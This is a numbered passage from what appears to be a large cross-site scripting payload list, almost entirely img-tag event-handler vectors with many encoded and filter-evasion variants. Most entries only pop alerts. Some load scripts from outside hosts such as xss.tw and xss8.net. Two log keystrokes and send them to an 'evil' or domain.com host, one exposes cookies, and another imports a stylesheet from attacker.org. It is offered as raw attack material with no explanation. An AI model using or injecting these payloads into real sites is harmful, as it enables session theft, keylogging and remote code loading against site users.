  3005. <IMG SRC_NeatHtmlReplace=”mocha:[code]”>
  3006. <IMG SRC_NeatHtmlReplace=’vbscript:msgbox(“XSS”)’>
  3007. <img src=``&NewLine; onerror=alert(1)&NewLine;
  3008. <img src=N onerror=eval(javascript:document.write(unescape(‘ <script src=”domain.js”></script>’));)>
  3009. <IMG SRC=”/” onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  3010. ←`<img/src=` onerror=alert(1)> — !>
  3011. ←`<img/src=` onerror=alert(1)> — !>
  3012. <img src=/ onerror=alert(1)>
  3013. <img+src+onerror=alert(1)>
  3014. <img src=��>��onerror=alert(9)>
  3015. <IMG SRC=/ onerror=”alert(String.fromCharCode(88
  3016. <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
  3017. <img src onerror /” ‘“= alt=alert(1)//”>
  3018. <img src onerror /” ‘“= alt=javascript:alert(1)//”>
  3019. ←`<img/src=` onerror=confirm(1)> — !>
  3020. <img/ src//’onerror/’’/=confirm(1)//’>
  3021. <img/src=` onerror=confirm(1)>
  3022. “<img/src=` onerror=confirm(1)>”
  3023. “>←`<img/src=` onerror=confirm(1)> — !>
  3024. “><img src=”” onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
  3025. “><img src=””onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
  3026. <img src=”#” onerror=”$.getScript(‘domain.js’)”>
  3027. <IMG SRC=”/” onerror=”jav&#x09;ascript:alert(‘XSS’);”>
  3028. <img/ src=`~` onerror=prompt(1)>
  3029. <img/src=@ onerror = prompt(‘1’)
  3030. <img/src=`` onerror=this.onerror=confirm(1)
  3031. <img/src=`` onerror=this.onerror=confirm(1)
  3032. <img src=”#” onerror=”var a=String.fromCharCode(47);$.getScript(a+a+’domain.sj’+a+’4091')”>
  3033. <img src=# onerror\x3D”javascript:alert(1)” >
  3034. <IMG SRC=”/” onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  3035. <IMG SRC=/ onkeydown=”alert(String.fromCharCode(88,83,83))”></img>
  3036. <IMG SRC=/ onkeypress=”alert(String.fromCharCode(88,83,83))”></img>
  3037. <IMG SRC=/ onkeyup=”alert(String.fromCharCode(88,83,83))”></img>
  3038. <IMG SRC=/ onload=”alert(String.fromCharCode(88,83,83))”></img>
  3039. <img src=//\ onload=confirm(1)>
  3040. <img src=”#” onload=”s=document.createElement(‘script’);s.src=’domain.js’+Math.random();document.body.appendChild(s)” border=”0">
  3041. <IMG SRC= onmouseover=”alert(‘xxs’)”>
  3042. <IMG SRC= onmouseover=”alert(“xxs”)”>
  3043. <IMG SRC=# onmouseover=”alert(‘xxs’)”>
  3044. <IMG SRC=# onmouseover=”alert(“xxs”)”>
  3045. <img/src=q onerror=’new Function`al\ert\`1\``’>
  3046. <img/src=q onerror=’new Function`al\ert\`OPENBUGBOUNTY\``’>
  3047. <img/src=renwax23%0A/**/onerror=eval(‘al’%2b’ert(1)’)>
  3048. <img src=””><SCRIPT/ASYNC/SRC=”/a3a?a?L”>
  3049. <img src=” →</script><svg/onload=alert(1)//”>
  3050. <img src=” →</script><svg/onload=alert(1)//”><! — <script>
  3051. <img srcset=popup=1; onerror=popup=1;>
  3052. <img src=”test.jpg” alt =”``onload=xss()”>
  3053. <img src=test.jpg?value=”>Yes, we are still inside a tag!”>
  3054. <img src=’test’ onmouseover=’alert(2)’>
  3055. <img src=”/” =_=” title=”onerror=’/**/prompt(1)’”>
  3056. <img src=”/” =_=” title=”onerror=’prompt(1)’”>
  3057. “><img src=”/” =_=” title=”onerror=’prompt(1)’”>
  3058. <img SRC=’vbscript:document.vulnerable=true;’>
  3059. <IMG SRC=’vbscript:msgbox(“anyunix”)’>
  3060. <IMG SRC=’vbscript:msgbox(document.location)’>
  3061. <IMG src=’vbscript:msgbox(“XmSS”)’>
  3062. <;IMG SRC=’;vbscript:msgbox(“;XSS”;)’;>;
  3063. <IMG SRC=’vbscript:msgbox(“XSS”)’>
  3064. <IMG SRC=’vbscript:msgbox(“XSS”)’>
  3065. <IMG SRC=’vbscript:msgbox(\”XSS\”)’>
  3066. <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
  3067. <img src\x00=x onerror=”javascript:alert(1)”>
  3068. <img src\x09=x onerror=”javascript:alert(1)”>
  3069. “><img/src=x%0Aonerror=prompt`1`>
  3070. <img src\x10=x onerror=”javascript:alert(1)”>
  3071. <img src\x11=x onerror=”javascript:alert(1)”>
  3072. <img src\x12=x onerror=”javascript:alert(1)”>
  3073. <img src\x13=x onerror=”javascript:alert(1)”>
  3074. `”’><img src=’#\x27 onerror=javascript:alert(1)>
  3075. <img src\x32=x onerror=”javascript:alert(1)”>
  3076. <img src\x47=x onerror=”javascript:alert(1)”>
  3077. <img src=”&#x68;&#x74;&#x74;&#x70;&#x3a;&#x2f;&#x2f;&#x77;&#x77;&#x77;&#x2e;&#x62;&#x61;&#x69;&#x64;&#x75;&#x2e;&#x63;&#x6f;&#x6d;&#x2f;&#x69;&#x6d;&#x67;&#x2f;&#x62;&#x64;&#x6c;&#x6f;&#x67;&#x6f;&#x2e;&#x67;&#x69;&#x66;”;>
  3078. <IMG SRC=&#x6A&#x61&#x76&#x61..?..&#x58&#x53&#x53&#x27&#x29>
  3079. <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
  3080. <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  3081. <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
  3082. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  3083. <img src=”x:%90" title=”onerror=alert(1)//”>
  3084. <img src=x[9,10,12,13,32]onerror=”alert(1)”>
  3085. <img src=x:alert(alt) onerror=eval(src) alt=0>
  3086. <img src=x:alert(alt) onerror=eval(src) alt=xss>
  3087. <img src=”x:alert” onerror=”eval(src%2b’(0)’)”>
  3088. <img src=”x:alert” onerror=”eval(src%2b’(1)’)”>
  3089. <img/src=x alt=confirm(1) onmouseover=eval(alt)>
  3090. <img src=”x” alt=”’’onmouseover=alert(1)”>
  3091. <img src=”x:gif” onerror=”alert(0)”>
  3092. <img src=”x:gif” onerror=”eval(‘al’%2b’ert(/renwax23/)’)”>
  3093. <img src=”x:gif” onerror=”eval(‘al’%2b’lert(0)’)”>
  3094. <img src=”x:gif” onerror=”window[‘al\u0065rt’]
  3095. <img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
  3096. <img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
  3097. <img src=”x:gif” onerror=”window[‘al\u0065rt’] (/’renwax23'/)”></img>
  3098. <img/src=”x”/id=”javascript”/name=”:confirm”/alt=”(1)”/onerror=”eval(id + name + alt)”>
  3099. <img src=”x:kcf” onerror=”alert(1)”>
  3100. <IMG SRC=x onabort=”alert(String.fromCharCode(88,83,83))”>
  3101. <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
  3102. <IMG SRC=x onbeforeprint=”alert(String.fromCharCode(88,83,83))”>
  3103. <IMG SRC=x onbeforeunload=”alert(String.fromCharCode(88,83,83))”>
  3104. <IMG SRC=x onblur=”alert(String.fromCharCode(88,83,83))”>
  3105. <IMG SRC=x oncanplay=”alert(String.fromCharCode(88,83,83))”>
  3106. <IMG SRC=x oncanplaythrough=”alert(String.fromCharCode(88,83,83))”>
  3107. <IMG SRC=x onchange=”alert(String.fromCharCode(88,83,83))”>
  3108. <img src=x on*chr*Error=”javascript:log(*num*)”/>
  3109. <IMG SRC=x onclick=”alert(String.fromCharCode(88,83,83))”>
  3110. <IMG SRC=x oncontextmenu=”alert(String.fromCharCode(88,83,83))”>
  3111. <IMG SRC=x oncopy=”alert(String.fromCharCode(88,83,83))”>
  3112. <IMG SRC=x oncuechange=”alert(String.fromCharCode(88,83,83))”>
  3113. <IMG SRC=x oncut=”alert(String.fromCharCode(88,83,83))”>
  3114. <IMG SRC=x ondblclick=”alert(String.fromCharCode(88,83,83))”>
  3115. <IMG SRC=x ondrag=”alert(String.fromCharCode(88,83,83))”>
  3116. <IMG SRC=x ondragend=”alert(String.fromCharCode(88,83,83))”>
  3117. <IMG SRC=x ondragenter=”alert(String.fromCharCode(88,83,83))”>
  3118. <IMG SRC=x ondragleave=”alert(String.fromCharCode(88,83,83))”>
  3119. <IMG SRC=x ondragover=”alert(String.fromCharCode(88,83,83))”>
  3120. <IMG SRC=x ondragstart=”alert(String.fromCharCode(88,83,83))”>
  3121. <IMG SRC=x ondrop=”alert(String.fromCharCode(88,83,83))”>
  3122. <IMG SRC=x ondurationchange=”alert(String.fromCharCode(88,83,83))”>
  3123. <IMG SRC=x onemptied=”alert(String.fromCharCode(88,83,83))”>
  3124. <IMG SRC=x onended=”alert(String.fromCharCode(88,83,83))”>
  3125. <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
  3126. <img src=x onerror=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
  3127. <img src=x onerror=&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#39;&#115;&#99;&#114;&#105;&#112;&#116;&#39;&#41;&#41;&#46;&#115;&#114;&#99;&#61;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#120;&#115;&#115;&#56;&#46;&#110;&#101;&#116;&#47;&#63;&#13;&#99;&#61;&#81;&#105;&#104;&#97;&#76;&#39;>
  3128. <IMG SRC=”/x” onerror=” &#14; javascript:alert(‘XSS’);”>
  3129. >’>”><img src=x onerror=alert(0)>
  3130. “><img src=x onerror=alert(0)>
  3131. <img src=x onerror=”alert(1)”
  3132. <img/src==”x onerror=alert(1)//”>
  3133. <img src=x onerror=alert(123) />
  3134. />.<<img src=x onerror=alert(1)//&gt;>&lt;&gt;&page=1
  3135. <img/src=’x’onerror=alert(1)>//INJECTX
  3136. <img src=x onerror=alert(24)> 29
  3137. “><img src=x onerror=’alert(document.domain)’>
  3138. <img src=x onerror=alert(/insight-labs/)>B<p
  3139. <img src=x onerror=alert(String.fromCharCode(88,83,83));>
  3140. “><img src=x onerror=alert(String.fromCharCode(88,83,83));>
  3141. <IMG SRC=x onerror=”alert(String.fromCharCode(88,83,83))”>
  3142. <img src=x onerror=alert(‘XSS’);>
  3143. “><img src=x onerror=alert(‘XSS’);>
  3144. “><img src=x onerror=’alert(xzz)’>
  3145. <img src=x onerror=appendChild(createElement(‘script’)).src=’//jsa}’ />
  3146. <img/src=”x”/onerror=”[boom]”>
  3147. ><img src=\”x\” onerror=\”confirm(0)\”/>
  3148. “\”><img src=\”x\” onerror=\”confirm(0)\”/>”,
  3149. “><img src=x onerror=confirm(1); …
  3150. @”><img src=x/onerror=confirm(1)>xss
  3151. <img src=x onerror=’confirm(domain+/ — /+cookie)’>”>
  3152. ><imgsrc=x onerror=confirm.onerror=confirm(1)>
  3153. “\”><imgsrc=x onerror=confirm.onerror=confirm(1)>”,
  3154. “><img src=x onerror=confirm(‘x’) />]
  3155. “><img src=x onerror=confirm`/XSS/`>//
  3156. “><img src=x onerror=co\u006efir\u006d`1`>
  3157. <img src=x onerror=document.body.appendChild(document.createElement(‘script’)).src=’domain.js’>
  3158. <img src=x onerror=”document.location=’http:&#x2F;&#x2F;xss.cx’”;>
  3159. <img src=x onerror=’document.onkeypress=function(e){fetch(“//evil?k=”+String.fromCharCode(e.which))},this.remove();’>
  3160. <img src=x onerror=’document.onkeypress=function(e){fetch(“http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
  3161. <img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
  3162. <img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement(“script”)).src=”http://xss.tw/3381"))>
  3163. <IMG SRC=”/x” onerror=”jav%00ascript:alert(‘XSS’);”>
  3164. “><img src=x onerror=javascript:alert(`1`)>
  3165. “><img src=x onerror=javascript:alert(‘1’)>
  3166. “><img src=x onerror=javascript:alert(“1”)>
  3167. “><img src=x onerror=javascript:alert((`1`))>
  3168. “><img src=x onerror=javascript:alert((‘1’))>
  3169. “><img src=x onerror=javascript:alert((“1”))>
  3170. “><img src=x onerror=javascript:alert(1)>
  3171. “><img src=x onerror=javascript:alert(`A`)>
  3172. “><img src=x onerror=javascript:alert(‘A’)>
  3173. “><img src=x onerror=javascript:alert(“A”)>
  3174. “><img src=x onerror=javascript:alert((`A`))>
  3175. “><img src=x onerror=javascript:alert((‘A’))>
  3176. “><img src=x onerror=javascript:alert((“A”))>
  3177. “><img src=x onerror=javascript:alert((A))>
  3178. “><img src=x onerror=javascript:alert(A)>
  3179. ><IMG SRC=x onerror=javascript:alert(&quot;Xss-By-Muhaddi&quot;)>
  3180. ><IMG SRC=x onerror=javascript:alert(&quot;Xss&quot;)>
  3181. ��><IMG SRC=x onerror=javascript:alert(&quot;Xss&quot;)>
  3182. <IMG SRC=”/x” onerror=”jav ascript:alert(‘XSS’);”>
  3183. <img src=x onerror=”javascript:window.onerror=alert;throw 1">
  3184. <Img src = x onerror = “javascript: window.onerror = alert; throw 1”>
  3185. <Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>
  3186. <IMG SRC=”/x” onerror=”jav&#x0D;ascript:alert(‘XSS’);”>
  3187. <img/src=”x”/onerror=”[JS-F**K Payload]”>
  3188. ><imgsrc=x onerror=prompt(0);>
  3189. “><img src=x onerror=prompt(0)>
  3190. <img src=x onerror=prompt(1);>
  3191. <img src=x onerror=prompt`1`>
  3192. <img src=x onerror=prompt(1);>
  3193. “><img src=x onerror=prompt(1)>
  3194. “><img src=x onerror=prompt(1);>
  3195. #><img src=x onerror=prompt(1)>
  3196. #��><img src=x onerror=prompt(1)>
  3197. <img src=x onerror=prompt(1)>//INJECTX
  3198. <img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
  3199. “><img src=x onerror=prompt(document.location);>#”><img src=x onerror=prompt(document.location);>
  3200. ‘ “/><img src= x onerror=prompt(/xss/)>
  3201. “><img src=x onerror=prompt(/xss by me/)>
  3202. “><img src=x onerror=prompt(“xss”);>#”><img src=x onerror=prompt(“xss”);>
  3203. <img src=x onerror=URL=’javascript:confirm(1)’>
  3204. <img src=x onerror=window.open(‘data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’);>
  3205. <img src=x onerror=window.open(‘http://google.com');>
  3206. “><img src=x onerror=window.open(‘https://www.google.com/');>
  3207. “><img src=x onerror=window.open(‘https://www.google.com/');>
  3208. <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’”></img>
  3209. <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’” width=”0" height=”0"></img><img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img>
  3210. <img src=x onerror=\x00"javascript:alert(1)”>
  3211. <img src=x onerror=\x09"javascript:alert(1)”>
  3212. <img src=x onerror=\x10"javascript:alert(1)”>
  3213. <img src=x onerror=\x11"javascript:alert(1)”>
  3214. <img src=x onerror=\x12"javascript:alert(1)”>
  3215. <img src=x onerror=\x32"javascript:alert(1)”>
  3216. ><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  3217. ��><IMG SRC=x onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  3218. <img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
  3219. ><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
  3220. “<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”
  3221. “\”><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”,
  3222. <img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>
  3223. “<img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>”
  3224. “/><img src=x onerror=x.onerror=prompt(0)>
  3225. “\”/><img src=x onerror=x.onerror=prompt(0)>”
  3226. “/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>
  3227. “\”/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>”
  3228. <IMG SRC=x onhashchange=”alert(String.fromCharCode(88,83,83))”>
  3229. <IMG SRC=x oninput=”alert(String.fromCharCode(88,83,83))”>
  3230. <IMG SRC=x oninvalid=”alert(String.fromCharCode(88,83,83))”>
  3231. <IMG SRC=x onkeydown=”alert(String.fromCharCode(88,83,83))”>
  3232. <IMG SRC=x onkeypress=”alert(String.fromCharCode(88,83,83))”>
  3233. <IMG SRC=x onkeyup=”alert(String.fromCharCode(88,83,83))”>
  3234. <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”>
  3235. <IMG SRC=x onloadeddata=”alert(String.fromCharCode(88,83,83))”>
  3236. <IMG SRC=x onloadedmetadata=”alert(String.fromCharCode(88,83,83))”>
  3237. <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
  3238. <IMG SRC=x onloadstart=”alert(String.fromCharCode(88,83,83))”>
  3239. <IMG SRC=x onmessage=”alert(String.fromCharCode(88,83,83))”>
  3240. <IMG SRC=x onmousedown=”alert(String.fromCharCode(88,83,83))”>
  3241. <IMG SRC=x onmousemove=”alert(String.fromCharCode(88,83,83))”>
  3242. <IMG SRC=x onmouseout=”alert(String.fromCharCode(88,83,83))”>
  3243. <IMG SRC=x onmouseover=”alert(String.fromCharCode(88,83,83))”>
  3244. <IMG SRC=x onmouseup=”alert(String.fromCharCode(88,83,83))”>
  3245. <IMG SRC=x onmousewheel=”alert(String.fromCharCode(88,83,83))”>
  3246. <IMG SRC=x onoffline=”alert(String.fromCharCode(88,83,83))”>
  3247. <IMG SRC=x ononline=”alert(String.fromCharCode(88,83,83))”>
  3248. <IMG SRC=x onpagehide=”alert(String.fromCharCode(88,83,83))”>
  3249. <IMG SRC=x onpageshow=”alert(String.fromCharCode(88,83,83))”>
  3250. <IMG SRC=x onpaste=”alert(String.fromCharCode(88,83,83))”>
  3251. <IMG SRC=x onpause=”alert(String.fromCharCode(88,83,83))”>
  3252. <IMG SRC=x onplay=”alert(String.fromCharCode(88,83,83))”>
  3253. <IMG SRC=x onplaying=”alert(String.fromCharCode(88,83,83))”>
  3254. <IMG SRC=x onpopstate=”alert(String.fromCharCode(88,83,83))”>
  3255. <IMG SRC=x onprogress=”alert(String.fromCharCode(88,83,83))”>
  3256. <IMG SRC=x onratechange=”alert(String.fromCharCode(88,83,83))”>
  3257. <img src=`x` onrerror= ` ;; alert(1) ` />
  3258. <IMG SRC=x onreset=”alert(String.fromCharCode(88,83,83))”>
  3259. <IMG SRC=x onresize=”alert(String.fromCharCode(88,83,83))”>
  3260. <IMG SRC=x onscroll=”alert(String.fromCharCode(88,83,83))”>
  3261. <IMG SRC=x onsearch=”alert(String.fromCharCode(88,83,83))”>
  3262. <IMG SRC=x onseeked=”alert(String.fromCharCode(88,83,83))”>
  3263. <IMG SRC=x onseeking=”alert(String.fromCharCode(88,83,83))”>
  3264. <IMG SRC=x onselect=”alert(String.fromCharCode(88,83,83))”>
  3265. <IMG SRC=x onshow=”alert(String.fromCharCode(88,83,83))”>
  3266. <IMG SRC=x onstalled=”alert(String.fromCharCode(88,83,83))”>
  3267. <IMG SRC=x onstorage=”alert(String.fromCharCode(88,83,83))”>
  3268. <IMG SRC=x onsubmit=”alert(String.fromCharCode(88,83,83))”>
  3269. <IMG SRC=x onsuspend=”alert(String.fromCharCode(88,83,83))”>
  3270. <IMG SRC=x ontimeupdate=”alert(String.fromCharCode(88,83,83))”>
  3271. <IMG SRC=x ontoggle=”alert(String.fromCharCode(88,83,83))”>
  3272. <IMG SRC=x onunload=”alert(String.fromCharCode(88,83,83))”>
  3273. <IMG SRC=x onvolumechange=”alert(String.fromCharCode(88,83,83))”>
  3274. <IMG SRC=x onwaiting=”alert(String.fromCharCode(88,83,83))”>
  3275. <IMG SRC=x onwheel=”alert(String.fromCharCode(88,83,83))”>
  3276. <img src=”x:o” title=”onerror=alert(1)//”>
  3277. <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
  3278. <img src=”x` `<script>alert(1)</script>”` `>
  3279. <img src=”x` `<script>javascript:alert(1)</script>”` `>
  3280. <img src=xss onerror=alert(1)>
  3281. <img/src=”xss.png”alt=”xss”>
  3282. <img src=”x:? title=” onerror=alert(1)//”>
  3283. <img src=x\x09onerror=”javascript:alert(1)”>
  3284. <img src=x\x10onerror=”javascript:alert(1)”>
  3285. <img src=x\x11onerror=”javascript:alert(1)”>
  3286. <img src=x\x12onerror=”javascript:alert(1)”>
  3287. <img src=x\x13onerror=”javascript:alert(1)”>
  3288. <img src=”xx# onerror=alert(1)//{0xf09d8c86}”>
  3289. <![<img src=x:x onerror=`alert(/ @jackmasa /)//`] →
  3290. “><img src=”x:x” onerror=”alert(XSS)”>
  3291. ‘><img/src=”x:x”/onerror=”confirm(1)”’><
  3292. <![<img src=x:x onerror=`confirm(2)//`] →
  3293. <img src=xx: onerror=confirm(document.location)>
  3294. <img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
  3295. “><img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
  3296. <! — `<img/src=xx:xx onerror=alert(1)// — !>
  3297. <img src=`xx:xx`onerror=alert(1)>
  3298. <img src=`xx:xx`onerror=confirm(1)>
  3299. <img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
  3300. ><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
  3301. “<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”
  3302. “\”><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”,
  3303. →<! — — -> <img src=xxx:x onerror=javascript:alert(1)> →
  3304. <img src=xx:xx onerror=window[[‘logChr*chr*’]](*num*)>
  3305. `”’><img src=xxx:x onerror\x00=javascript:alert(1)>
  3306. `”’><img src=xxx:x onerror\x09=javascript:alert(1)>
  3307. `”’><img src=xxx:x onerror\x0A=javascript:alert(1)>
  3308. `”’><img src=xxx:x onerror\x0B=javascript:alert(1)>
  3309. `”’><img src=xxx:x onerror\x0C=javascript:alert(1)>
  3310. `”’><img src=xxx:x onerror\x0D=javascript:alert(1)>
  3311. `”’><img src=xxx:x onerror\x20=javascript:alert(1)>
  3312. `”’><img src=xxx:x \x00onerror=javascript:alert(1)>
  3313. `”’><img src=xxx:x \x09onerror=javascript:alert(1)>
  3314. `”’><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  3315. `”’><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  3316. `”’><img src=xxx:x \x0Conerror=javascript:alert(1)>
  3317. `”’><img src=xxx:x \x0Donerror=javascript:alert(1)>
  3318. `”’><img src=xxx:x \x20onerror=javascript:alert(1)>
  3319. `”’><img src=xxx:x \x22onerror=javascript:alert(1)>
  3320. `”’><img src=xxx:x \x27onerror=javascript:alert(1)>
  3321. `”’><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  3322. <IMG STYLE=’
  3323. <IMG STYLE_NeatHtmlReplace=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
  3324. <img style=”xss:expression(alert(0))”>
  3325. <Img style = “xss: expression (alert (0))”>
  3326. <IMG STYLE=’xss:expre\ssion(alert(“X5SS”))’>
  3327. <IMG STYLE=”xss: expre\ssion(alert(“XSS”))”>
  3328. <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
  3329. <;IMG STYLE=”;xss:expr/*XSS*/ession(alert(‘;XSS’;))”;>;
  3330. <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
  3331. <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”
  3332. <IMG STYLE=”xss:expr/*XSS*ession(alert(‘XSS’))”>
  3333. <IMG STYLE=”xss:expr/*XSS*/ession(confirm(document.location))”>
  3334. <img STYLE=”xss:expr/*XSS*/ession(document.vulnerable=true)”>
  3335. <IMG STYLE=”xss:expr/*XSS*/ession(javascript:alert(1))”>
  3336. <img =”=” title=”><img src=1 onerror=alert(1)>”
  3337. <img \x00src=x onerror=”alert(1)”>
  3338. <img \x00src=x onerror=”javascript:alert(1)”>
  3339. <img\x0bsrc=’1'\x0bonerror=alert(0)>
  3340. <;IMG&#x0D;SRC&#x0D;=&#x0D;”;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;’;&#x0D;X&#x0D;S&#x0D;S&#x0D;’;&#x0D;)&#x0D;”;&#x0D;>;&#x0D;
  3341. <img\x10src=x onerror=”javascript:alert(1)”>
  3342. <img \x11src=x onerror=”javascript:alert(1)”>
  3343. <img\x11src=x onerror=”javascript:alert(1)”>
  3344. <img \x12src=x onerror=”javascript:alert(1)”>
  3345. <img\x13src=x onerror=”javascript:alert(1)”>
  3346. <img\x32src=x onerror=”javascript:alert(1)”>
  3347. <img \x34src=x onerror=”javascript:alert(1)”>
  3348. <img \x39src=x onerror=”javascript:alert(1)”>
  3349. <img \x47src=x onerror=”javascript:alert(1)”>
  3350. <img\x47src=x onerror=”javascript:alert(1)”>
  3351. <img x/src=x /onerror=”x-\u0063onfirm(1)”>
  3352. import(‘da\r\nta:text/\ecmascript\,alert%601%60’)
  3353. import(‘data:text/javascript,alert(1)’)
  3354. <?import namespace=”t” implementation=”#default#time2">
  3355. <?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;”></BODY></HTML>
  3356. <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc">
  3357. <?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc">
  3358. @import url(http://attacker.org/malicious.css)
  3359. ‘/(@import)/Usi’,
  3360. ?injection=<script+&injection=>alert(1)></script>
  3361. Injection with GIF File as Source of Script (CSP Bypass)
  3362. innerHTML=document.title
  3363. innerHTML=innerText
  3364. innerHTML=location.hash>#<script>alert(1)</script>
  3365. /><input>
